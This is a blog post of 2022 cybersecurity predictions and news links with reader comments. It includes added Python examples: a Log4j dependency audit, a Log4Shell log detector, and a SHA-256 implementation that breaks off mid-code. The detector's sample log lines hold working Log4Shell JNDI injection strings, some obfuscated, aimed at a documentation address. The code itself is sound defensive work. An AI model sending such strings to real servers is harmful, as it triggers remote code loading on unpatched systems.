Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency and increased reliability, and enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated in searching for vulnerabilities and delivering malware by adapting and automating machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability, named Log4Shell, to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the follow-up findings in the same software (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). CVE-2021-42550, which is often listed alongside them, is a configuration-file JNDI issue in the separate Logback library rather than in Log4j itself.
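The dependency-patching problem described above is easy to get wrong because each Log4j 2 release branch has its own patched version (2.17.1 needs Java 8; the Java 7 line was fixed in 2.12.4 and the Java 6 line in 2.3.2). The following is an added example, not code from the article or from the Log4j project: a small Python audit that reads `mvn dependency:tree` output and reports which of the four Log4j CVEs named above still apply to each `log4j-core` version it finds. The sample tree is constructed for this example, the patched-version floors are taken from the Apache Log4j security advisories, and the audit assumes that 2.0 beta builds behave like 2.0.0 and that only `log4j-core` (not `log4j-api`) carries the vulnerable lookup code.

```python
import re
from typing import Dict, List, Tuple

# Patched-version floors per Log4j 2 release branch (Java 6, Java 7 and Java 8+ lines),
# from the Apache Log4j security advisories. A log4j-core version below the floor
# for a CVE is affected by that CVE.
FIXED_IN = {
    "2.3":  {"CVE-2021-44228": (2, 3, 1),  "CVE-2021-45046": (2, 3, 1),
             "CVE-2021-45105": (2, 3, 1),  "CVE-2021-44832": (2, 3, 2)},
    "2.12": {"CVE-2021-44228": (2, 12, 2), "CVE-2021-45046": (2, 12, 2),
             "CVE-2021-45105": (2, 12, 3), "CVE-2021-44832": (2, 12, 4)},
    "main": {"CVE-2021-44228": (2, 15, 0), "CVE-2021-45046": (2, 16, 0),
             "CVE-2021-45105": (2, 17, 0), "CVE-2021-44832": (2, 17, 1)},
}
EOL_1X = "log4j 1.x is end-of-life and unsupported"

# One `mvn dependency:tree` line looks like
#   "[INFO] +- groupId:artifactId:jar:version:scope"
DEP_RE = re.compile(r"([\w.\-]+):([\w.\-]+):(?:jar|bundle|pom):([\w.\-]+)(?::(\w+))?")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1). Qualifiers are dropped, so '2.0-beta9' becomes (2, 0, 0) (assumption)."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def branch_of(v: Tuple[int, ...]) -> str:
    """Pick the release branch whose patched floors apply to this version."""
    if v < (2, 4, 0):
        return "2.3"
    if v < (2, 13, 0):
        return "2.12"
    return "main"


def cves_for(version: str) -> List[str]:
    """CVEs from FIXED_IN that still apply to this log4j-core version."""
    v = parse_version(version)
    if v[0] < 2:
        return [EOL_1X]
    floors = FIXED_IN[branch_of(v)]
    return [cve for cve, floor in floors.items() if v < floor]


def audit_tree(tree_output: str) -> Dict[str, List[str]]:
    """Map each Log4j artifact found in `mvn dependency:tree` output to its open CVEs."""
    findings: Dict[str, List[str]] = {}
    for line in tree_output.splitlines():
        m = DEP_RE.search(line)
        if not m:
            continue
        group, artifact, version, _scope = m.groups()
        # Only log4j-core carries the JNDI lookup code; log4j-api alone is not affected.
        if (group, artifact) in (("org.apache.logging.log4j", "log4j-core"), ("log4j", "log4j")):
            findings[f"{group}:{artifact}:{version}"] = cves_for(version)
    return findings


# Constructed `mvn dependency:tree` output for this example (not a real project).
SAMPLE_TREE = r"""
[INFO] com.example:shop-backend:jar:1.0.0
[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] |  \- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO] +- com.example:legacy-reports:jar:3.2.0:compile
[INFO] |  \- log4j:log4j:jar:1.2.17:compile
[INFO] \- org.apache.logging.log4j:log4j-core:jar:2.17.1:test
"""

if __name__ == "__main__":
    for artifact, cves in audit_tree(SAMPLE_TREE).items():
        print(f"{artifact}: {', '.join(cves) or 'patched for the four CVEs above'}")
```

A clean result from the dependency tree does not clear shaded or "fat" JARs that bundle their own copy of log4j-core; those do not appear in the tree and have to be inspected as archives.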
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
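The "large number of exploit variations" Akamai refers to above are mostly obfuscations of the same `${jndi:...}` lookup string, built from Log4j’s own nested lookups (`${lower:j}`, `${upper:j}`, `${::-j}`, `${env:X:-j}`) and URL encoding, so a detector that matches only the literal `${jndi:` misses most of them. The following added example (not from Akamai’s post) normalizes those forms before matching and runs over a handful of constructed web-access-log lines that use 203.0.113.0/24 documentation addresses. It is triage and detection logic only; the fix for the vulnerability itself is upgrading `log4j-core`.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost lookups only (no nested "${" inside the braces), so repeating the
# substitutions resolves a payload from the inside out.
LOWER_RE = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)   # ${lower:J} -> j
UPPER_RE = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)   # ${upper:j} -> J
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")             # ${::-j}, ${env:X:-j} -> j
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)[:/]", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and lookup-based obfuscation until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)                                     # %24%7B -> ${
        text = LOWER_RE.sub(lambda m: m.group(1).lower(), text)
        text = UPPER_RE.sub(lambda m: m.group(1).upper(), text)
        text = DEFAULT_RE.sub(lambda m: m.group(1), text)
        if text == before:
            return text
    return text  # bounded so a hostile input cannot keep the loop going


def detect(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) found after de-obfuscation, or None."""
    m = JNDI_RE.search(normalize(line))
    return m.group("scheme").lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, scheme) for every line that carries a Log4Shell lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = detect(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log lines for this example (not real traffic).
LOG_LINES = [
    '203.0.113.9 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.50:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.50/x}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.50/y}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//203.0.113.50/z}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:07 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.50%2Fw%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.10 - - [10/Dec/2021:22:14:08 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for index, scheme in scan(LOG_LINES):
        print(f"line {index}: jndi lookup via {scheme}")
```

The `dns` scheme in the fifth line is the reconnaissance case the post mentions: it triggers no code execution, only an outbound lookup that tells the attacker which hosts are vulnerable, so those hits deserve the same follow-up as the `ldap` and `rmi` ones.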
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1. Malware, 2. Mobile, 3. Machine Learning and AI, 4. Ransomware (because we simply couldn’t not give it a section of its own), and 5. Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
• Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence (CTI) reports by analysts. Next year analysts will be able to use AI tools to generate automated CTI reports. Such reports provide the indicators and early warning needed to better monitor unusual activity on a given network and to detect cyber threats more rapidly.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Mobile phone security is being reworked
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has rested for more than a decade on trusted processing performed in a TEE (Trusted Execution Environment), an isolated execution environment with its own protected memory. The standard smartphone solution is typically built on Arm’s TrustZone technology: the phone’s own security comes from the TEE, and the secure boot chain usually brings up the TEE. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed about 15 years ago).
The memory a TEE requires has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted Secure Boot and memory or flash encryption instead, but these have been fairly weak solutions. Recently, Arm’s TrustZone-M has brought a comparable security model to Cortex-M microcontrollers.
In recent years this picture has begun to diversify, and a revolution is now underway. Google has launched Keystore technology (Android Keystore) that lets an application generate a system-maintained key and authenticate to services (it still relies on the TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclave memory lives in a limited Enclave Page Cache (EPC), which constrained how large enclaves could be and limited their use. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, which isolates whole virtual machines; AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The new Armv9-A architecture, announced in 2021, offers a realm mode that is very close to the confidential-computing technologies offered on the server side (Intel SGX and TDX, AMD SEV). With the coming enclaves, an unlimited number of secured environments will in principle be available.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Cyber attacks already threaten goods deliveries too
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools extend cybercrime beyond technically savvy individuals and criminal organizations to everyone. The new “Everything as a Service” model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a “cyber pandemic”: an internet outage could throw the world into chaos again
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in a direction where technology evolves faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Cyber attacks are accelerating, but companies can respond to them
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection.
The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micro report: in the future everything is at risk
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Microsoft starts killing off WMIC in Windows, will thwart attacks
https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-killing-off-wmic-in-windows-will-thwart-attacks/
Tomi Engdahl says:
Russian APT Hackers Used COVID-19 Lures to Target European Diplomats
https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html
Tomi Engdahl says:
https://www.facebook.com/groups/shahidzafar/permalink/5132916256727460/
What’s a good open-source vulnerability scanner that you’ve used and would recommend. I’ve mostly used proprietary tools like Qualys, Nessus but would like to recommend a tool(preferably free) for a small local business.
Last time I checked, Rapid7 Nexpose was available for free for up to 32 IPs. Not open source, but still a good scanner.
Depends on the number of hosts you need to scan.
Nessus essentials will do up to 16.
Otherwise look at openvas.
if they need more than 16 then they can afford premium.
Apart from Qualys and Nessus, try the Metasploit Framework or Burp Suite.
Alien OTX have an offering as well. Can’t think what it’s called now think it’s OSSM
I don’t use scanners. They’re noisy and really don’t provide concise information… but mostly because they are noisy and easy to detect.
Nessus is the non-free fork of Openvas (Greenbone), So just use Openvas.
Tomi Engdahl says:
An open-source tool for software security
https://news.mit.edu/2022/r2c-software-security-0210
The startup r2c, founded by MIT alumni, offers a database of software security checks to simplify the process of securing code.
Tomi Engdahl says:
Why are cybersecurity asset management startups so hot right now?
https://techcrunch.com/2022/02/11/why-are-internet-asset-startups-so-hot-right-now/
In the world of cybersecurity, you can’t secure something if you don’t know it’s there.
Enter cybersecurity asset management, an admittedly unsexy fragment of the booming industry that investors have shown an ever-increasing appetite for over the past 18 months.
The cybersecurity industry experienced what is being hailed by some as a “golden year” — funding for cyber startups climbed by 138% to $29.5 billion in 2021 and M&A activity skyrocketed by more than 294% to $77.5 billion. And those focused on securing an organization’s internet-facing assets have received more attention than most.
Tomi Engdahl says:
Privacy Preserving Attribution for Advertising
https://blog.mozilla.org/en/mozilla/privacy-preserving-attribution-for-advertising/
Advertising provides critical support for the Web. We’ve been looking to apply privacy preserving advertising technology to the attribution problem, so that advertisers can get answers to important questions without harming privacy.
Attribution is how advertisers know if their advertising campaigns are working. Attribution generates metrics that allow advertisers to understand how their advertising campaigns are performing. Related measurement techniques also help publishers understand how they are helping advertisers. Though attribution is crucial to advertising, current attribution practices have terrible privacy properties.
Tomi Engdahl says:
https://cybersecuritymate.com/secure-cloud-computing/
Tomi Engdahl says:
https://www.techrepublic.com/article/hybrid-work-and-the-great-resignation-lead-to-cybersecurity-concerns/
Tomi Engdahl says:
What your smart TV knows about you – and how to stop it harvesting data
Modern TVs gather data that can be monetised. How much of this surveillance can you avoid without turning your smart TV dumb?
https://www.theguardian.com/technology/2022/jan/29/what-your-smart-tv-knows-about-you-and-how-to-stop-it-harvesting-data
Tomi Engdahl says:
IT security: Computer attacks with laser light
LaserShark: KIT Researchers demonstrate hidden communication into air-gapped computer systems – data transmitted to light-emitting diodes of regular office devices
https://www.eurekalert.org/news-releases/938649
Tomi Engdahl says:
Senators: CIA has secret program that collects American data https://www.washingtonpost.com/politics/senators-cia-has-secret-program-that-collects-american-data/2022/02/10/017b6932-8ad8-11ec-838f-0cfdf69cce3c_story.html
The CIA has a secret, undisclosed data repository that includes information collected about Americans, two Democrats on the Senate Intelligence Committee said. While neither the agency nor lawmakers would disclose specifics about the data, the senators alleged the CIA had long hidden details about the program from the public and Congress.
Tomi Engdahl says:
Hacking group ModifiedElephant evaded discovery for a decade
https://www.bleepingcomputer.com/news/security/hacking-group-modifiedelephant-evaded-discovery-for-a-decade/
Researchers at SentinelLabs in a report today detail the tactics of ModifiedElephant, explaining how recently published evidence helped them attribute previously “orphan” attacks. [..] The SentinelLabs report makes several correlations between the timing of specific ModifiedElephant attacks and the arrest of targets that followed shortly after. This coincidence, combined with the targeting scope, which aligns with the interests of the Indian state, constructs a very probable hypothesis that the hackers are sponsored by circles of India’s official administration. Freedom of speech activists and academics aren’t targeted for financial purposes, so these attacks always have an underlying political nuance. Also:
https://thehackernews.com/2022/02/hackers-planted-fake-digital-evidence.html.
https://therecord.media/jailed-indian-activist-was-targeted-by-state-linked-hacking-group-report-says/
Tomi Engdahl says:
Sharp SIM-Swapping Spike Causes $68M in Losses https://threatpost.com/sharp-sim-swapping-spike-losses/178358/
SIM-swapping, the practice of duping mobile carriers into switching a target’s phone services to an attacker-controlled phone, is on the rise, the Feds are warning, leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.
Tomi Engdahl says:
US nuclear power plants contain dangerous counterfeit parts, report finds https://www.theverge.com/2022/2/11/22929255/us-nuclear-power-plants-dangerous-counterfeit-parts-nrc-report
At least some nuclear power plants in the US contain counterfeit parts that could pose significant risks, an investigation by the inspector general’s office of the Nuclear Regulatory Commission has found. Those parts “present nuclear safety and security concerns that could have serious consequences,” says the resulting report published on February 9th.
Tomi Engdahl says:
Google forced a change on 150 million people; this is what happened https://www.is.fi/digitoday/tietoturva/art-2000008604246.html
GOOGLE reports on a security change it pushed through. Last year the company turned on two-step verification for more than 150 million Google account holders, and according to the company the consequences are considerable. “As a result of this initiative, we have seen a 50 percent drop in the number of compromised accounts,” director Jen Fitzpatrick writes.
Tomi Engdahl says:
Linux malware attacks are on the rise, and businesses aren’t ready for it https://www.zdnet.com/article/linux-malware-attacks-are-on-the-rise-and-businesses-arent-ready-for-it/
Cyber criminals are increasingly targeting Linux servers and cloud infrastructure to launch ransomware campaigns, cryptojacking attacks and other illicit activity, and many organisations are leaving themselves open to attacks because Linux infrastructure is misconfigured or poorly managed. Source:
https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html
Tomi Engdahl says:
Apple plans AirTag updates to curb unwanted tracking https://edition.cnn.com/2022/02/10/tech/airtag-safety-updates/index.html
Apple (AAPL) said Thursday it plans to add more safeguards to AirTags to cut down on unwanted tracking following reports that the devices have been used to stalk people and steal cars. In a blog post, Apple said it has worked with safety groups and law enforcement agencies to identify more ways to update its AirTag safety warnings, including alerting people sooner if the small Bluetooth tracker is suspected of tracking someone. (Right now, it can take hours for an AirTag to chirp if it has been separated from its owner.) Source:
https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/
Tomi Engdahl says:
SHA256
There’s something very satisfying about finally understanding an algorithm that your computer uses every day for encryption. If you’re reading this, you’re probably similarly intrigued by algorithms. I present the step-by-step SHA256 visualizer.
https://sha256algorithm.com/
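SHA-256 is a hash function rather than an encryption algorithm, and the steps the visualizer above animates (padding, the 64-word message schedule, and 64 compression rounds) fit in a short program. The following is an added example written for this page, not code from sha256algorithm.com: a pure-Python SHA-256 that derives the round constants from the cube and square roots of the first 64 primes with exact integer arithmetic instead of hard-coding them, and checks itself against `hashlib`. It is for understanding the algorithm; use `hashlib` in real code.

```python
import hashlib
import struct
from math import isqrt
from typing import Iterable, List

MASK = 0xFFFFFFFF


def first_primes(n: int) -> List[int]:
    """The first n primes by trial division (only 64 are needed)."""
    primes: List[int] = []
    c = 2
    while len(primes) < n:
        if all(c % p for p in primes if p * p <= c):
            primes.append(c)
        c += 1
    return primes


def icbrt(n: int) -> int:
    """Exact integer cube root (floor) via Newton's method started above the root."""
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


PRIMES = first_primes(64)
# K[i] = first 32 fraction bits of cbrt(prime_i); H0[i] = first 32 fraction bits of sqrt(prime_i).
K = [icbrt(p << 96) & MASK for p in PRIMES]
H0 = [isqrt(p << 64) & MASK for p in PRIMES[:8]]


def rotr(x: int, n: int) -> int:
    return ((x >> n) | (x << (32 - n))) & MASK


def pad(msg: bytes) -> bytes:
    """Append 0x80, zeros to 56 mod 64, then the 64-bit big-endian bit length."""
    bit_len = len(msg) * 8
    msg += b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    return msg + struct.pack(">Q", bit_len)


def compress(state: List[int], block: bytes) -> List[int]:
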